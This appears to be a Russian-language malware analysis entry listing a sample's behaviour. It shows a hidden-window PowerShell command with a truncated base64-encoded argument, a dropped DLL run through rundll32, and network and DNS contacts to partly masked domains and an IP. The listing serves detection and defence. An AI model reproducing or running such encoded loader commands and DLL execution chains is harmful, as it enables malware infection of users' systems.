Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABVAF8AbQBwAGEAMABrAD0AKAAoACcAUQBiAHEAJwArACcAbwAnACkAKwAoACcAMgAnACsAJwB5AGsAJwApACkAOwAuACgAJwBuAGUAdwAtAGkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABFAG4AVgA6AHUAUwBFAFIAUA...
- %HOMEPATH%\ihnpkxb\w4nhglo\d_u15dtxx.dll
- 'ka######oceryandgifts.com':443
- 'pu###azh.com':443
- 'la####.sowilo.co.za':443
- '67.##.105.174':3786
- DNS ASK ka######oceryandgifts.com
- DNS ASK pu###azh.com
- DNS ASK la####.sowilo.co.za
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABVAF8AbQBwAGEAMABrAD0AKAAoACcAUQBiAHEAJwArACcAbwAnACkAKwAoACcAMgAnACsAJwB5AGsAJwApACkAOwAuACgAJwBuAGUAdwAtAGkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABFAG4AVgA6AHUAUwBFAFIAUA...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\Ihnpkxb\W4nhglo\D_u15dtxx.dll 0